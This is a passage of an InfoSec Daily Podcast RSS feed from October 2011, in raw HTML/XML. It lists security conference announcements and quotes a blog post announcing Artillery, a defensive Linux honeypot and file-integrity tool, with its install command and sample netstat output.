	<a href="http://www.securitybsides.com/w/page/44893559/BSidesATL-2011"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/44893559/BSidesATL-2011</span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &nbsp;Of course all day Podcast Area.</span></p>
<p>	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSidesDFW 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 5th, 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span></a><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Microsoft Technology Center Dallas</span></a><br />
	<a href="http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011<br class="kix-line-break" /><br />
	</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cost = FREE</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2011 Fall Information Security Conference</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 8 &#8211; 9, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA (Loudermilk Conference Center)<br class="kix-line-break" /><br />
	</span><a href="http://www.gaissa.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.gaissa.org</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Delaware</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 11-12, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Wilmington University, Delaware Campus</span><br />
	<a href="http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.secmaniac.com/blog/2011/10/14/new-tool-release-artillery-for-linux-protection/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.secmaniac.com/blog/2011/10/14/new-tool-release-artillery-for-linux-protection/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Over the past few months I&rsquo;ve been working on a side project when I had some spare time. I&rsquo;m releasing the 0.1 alpha pre-release edition of Artillery. Artillery is a combination of a honeypot, file monitoring and integrity, alerting, and brute force prevention tool. It&rsquo;s extremely light weight, has multiple different methods for detecting specific attacks and eventually will also notify you of insecure nix configurations.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&rsquo;s written in Python, its completely open-source and free as all the stuff I write is. You can download Artillery here:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">svn co http://svn.secmaniac.com/artillery artillery/</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To install, simply run ./install.py. This will add artillery to bootup and start Artillery. To give a run down of some of the features. Here is a netstat before:</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">root@bt:~/Desktop/dev# netstat -antp | grep LISTEN</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">root@bt:~/Desktop/dev#</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Here is a netstat after running Artillery:</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">root@bt:~# netstat -antp | grep LISTEN</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">tcp 0 0 0.0.0.0:135 0.0.0.0:* LISTEN 29310/python</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">tcp 0 0 0.0.0.0:5800 0.0.0.0:* LISTEN 29310/python</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 29310/python</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">tcp 0 0 0.0.0.0:5900 0.0.0.0:* LISTEN 29310/python</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN 29310/python</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">tcp 0 0 0.0.0.0:10000 0.0.0.0:* LISTEN 29310/python</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 29310/python</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">tcp 0 0 0.0.0.0:53 0.0.0.0:* LISTEN 29310/python</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 29310/python</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 29310/python</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN 29310/python</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">tcp 0 0 0.0.0.0:1433 0.0.0.0:* LISTEN 29310/python</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">tcp 0 0 0.0.0.0:1337 0.0.0.0:* LISTEN 29310/python</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">tcp 0 0 0.0.0.0:44443 0.0.0.0:* LISTEN 29310/python</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">tcp 0 0 0.0.0.0:1723 0.0.0.0:* LISTEN 29310/python</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">tcp 0 0 0.0.0.0:3389 0.0.0.0:* LISTEN 29310/python</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN 29310/python</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">root@bt:~#</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If anyone decides to port scan or touch those ports, they are blacklisted immediately and permanently. It&rsquo;s multi-threaded and can handle as many connections thrown at it. I did some extensive testing under heavy traffic loads on secmaniac.com and derbycon.com. In the first 3 days, it blocked over 387 individuals.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In addition to the monitoring, it will also monitor file integrity leveraging sha-512 database where it keeps track of all system files and if anything changes, will email you with the change. By default it monitors /etc/ and /var/www.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Artillery also monitors the SSH logs, and the event of a brute force attack, blacklists the host forever.</span></p>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Interview:</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-496-dave%e2%80%99s-new-tool-scot-terban-interview/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/2972/0/infosec-daily-podcast-episode-496.mp3" length="23032203" type="audio/mpeg" />
		<itunes:duration>0:47:56</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 496 for October 17, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma
	Special Guest: Scot Terban
	Announcements:
	Hack3rCon 2011
	When: October [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 496 for October 17, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma
	Special Guest: Scot Terban
	Announcements:
	Hack3rCon 2011
	When: October 21-23rd, 2011
	Where: the Charleston House Hotel and Conference Center
	http://www.hack3rcon.org/
	NordSec 2011
	When: October 26&#8211;28, 2011
	Where: Tallinn Science Park &#8220;Tehnopol&#8221;, Tallinn, Estonia
	http://nordsec2011.cyber.ee/
	New Hampshire InfoSec Tweetup
	When: October 29, 2011
	Where: Pawtuckaway State Park in Nottingham, NH
	http://nhinfosectweetup.eventbrite.com/ 
	( It is just a gathering of security professionals and their families. &#160;No talks, just abunch of likeminded people and some good food.)
	SkyDogCon
	When: Nov 4th &#8211; Nov 6th
	Where: Holiday Inn Airport, Nashville, TN
	http://www.skydogcon.com
	Phreaknic
	When: Nov 4th &#8211; Nov 6th
	Where: Days Inn Stadium, Nashville, TN
	http://www.phreaknic.info
	BsidesATL 2011
	When: November 4th, 2011
	Where: Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).
	http://www.securitybsides.com/w/page/44893559/BSidesATL-2011
	This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &#160;Of course all day Podcast Area.
	BSidesDFW 2011
	When: November 5th, 2011
	Where: Microsoft Technology Center Dallas
	http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011
	Cost = FREE
	2011 Fall Information Security Conference
	When: &#160;November 8 &#8211; 9, 2011
	Where: Atlanta, GA (Loudermilk Conference Center)
	http://www.gaissa.org
	BSides Delaware
	When: November 11-12, 2011
	Where: Wilmington University, Delaware Campus
	http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: http://www.secmaniac.com/blog/2011/10/14/new-tool-release-artillery-for-linux-protection/
	Over the past few months I&#8217;ve been working on a side project when I had some spare time. I&#8217;m releasing the 0.1 alpha pre-release edition of Artillery. Artillery is a combination of a honeypot, file monitoring and integrity, alerting, and brute force prevention tool. It&#8217;s extremely light weight, has multiple different methods for detecting specific attacks and eventually will also notify you of insecure nix configurations.
	It&#8217;s written in Python, its completely open-source and free as all the stuff I write is. You can download Artillery here:
	svn co http://svn.secmaniac.com/artillery artillery/
	To install, simply run ./install.py. This will add artillery to bootup and start Artillery. To give a run down of some of the features. Here is a netstat before:
	root@bt:~/Desktop/dev# netstat -antp &#124; grep LISTEN
	root@bt:~/Desktop/dev#
	Here is a netstat after running Artillery:
	root@bt:~# netstat -antp &#124; grep LISTEN
	tcp 0 0 0.0.0.0:135 0.0.0.0:* LISTEN 29310/python
	tcp 0 0 0.0.0.0:5800 0.0.0.0:* LISTEN 29310/python
	tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 29310/python
	tcp 0 0 0.0.0.0:5900 0.0.0.0:* LISTEN 29310/python
	tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN 29310/python
	tcp 0 0 0.0.0.0:10000 0.0.0.0:* LISTEN 29310/python
	tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 29310/python
	tcp 0 0 0.0.0.0:53 0.0.0.0:* LISTEN 29310/python
	tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 29310/python
	tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 29310/python
	tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN 29310/python
	tcp 0 0 0.0.0.0:1433 0.0.0.0:* LISTEN 29310/python
	tcp 0 0 0.0.0.0:1337 0.0.0.0:* LISTEN 29310/python
	tcp 0 0 0.0.0.0:44443 0.0.0.0:* LISTEN 29310/python
	tcp 0 0 0.0.0.0:1723 0.0.0.0:* LISTEN 29310/[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 495 &#8211;  The Blame Game, Netflix Fakester, Dave’s Moonlighting, Private Googlez, Safari &amp; RIM</title>
		<link>http://www.isdpodcast.com/episode-495-the-blame-game-netflix-fakester-dave%e2%80%99s-moonlighting-private-googlez-safari-rim</link>
		<comments>http://www.isdpodcast.com/episode-495-the-blame-game-netflix-fakester-dave%e2%80%99s-moonlighting-private-googlez-safari-rim#comments</comments>
		<pubDate>Sat, 15 Oct 2011 01:03:30 +0000</pubDate>
		<dc:creator>Karthik.Rangarajan</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=2969</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 495 for Friday, October 14, 2011. &#160;Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, Geordy Rostad, and Dr. b0n3z. Announcements: Hack3rCon 2011 When: October 21-23rd, 2011 Where: the Charleston House Hotel and Conference Center http://www.hack3rcon.org/ NordSec 2011 When: October 26&#8211;28, 2011 Where: Tallinn Science Park &#8220;Tehnopol&#8221;, Tallinn, Estonia http://nordsec2011.cyber.ee/ New [...]]]></description>
			<content:encoded><![CDATA[<p><span id="internal-source-marker_0.2098183255564987" style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 495 for Friday, October 14, 2011. &nbsp;Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, Geordy Rostad, and Dr. b0n3z.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hack3rCon 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 21-23rd, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: the Charleston House Hotel and Conference Center</span><br />
	<a href="http://www.hack3rcon.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.hack3rcon.org/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">NordSec 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 26&ndash;28, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Tallinn Science Park &ldquo;Tehnopol&rdquo;, Tallinn, Estonia</span><br />
	<a href="http://nordsec2011.cyber.ee/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nordsec2011.cyber.ee/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New Hampshire InfoSec Tweetup</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 29, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Pawtuckaway State Park in Nottingham, NH</span><br />
	<a href="http://nhinfosectweetup.eventbrite.com/%20"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nhinfosectweetup.eventbrite.com/ </span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">( It is just a gathering of security professionals and their families. &nbsp;No talks, just abunch of likeminded people and some good food.)</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SkyDogCon</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Holiday Inn Airport, Nashville, TN</span><br />
	<a href="http://www.skydogcon.com/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Phreaknic</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Days Inn Stadium, Nashville, TN</span><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.phreaknic.info</span></a></p>
<p>
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSidesDFW 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 5th, 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span></a><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Microsoft Technology Center Dallas</span></a><br />
	<a href="http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011<br class="kix-line-break" /><br />
	</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cost = FREE</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2011 Fall Information Security Conference</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 8 &#8211; 9, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA (Loudermilk Conference Center)<br class="kix-line-break" /><br />
	</span><a href="http://www.gaissa.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.gaissa.org</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Delaware</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 11-12, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Wilmington University, Delaware Campus</span><br />
	<a href="http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
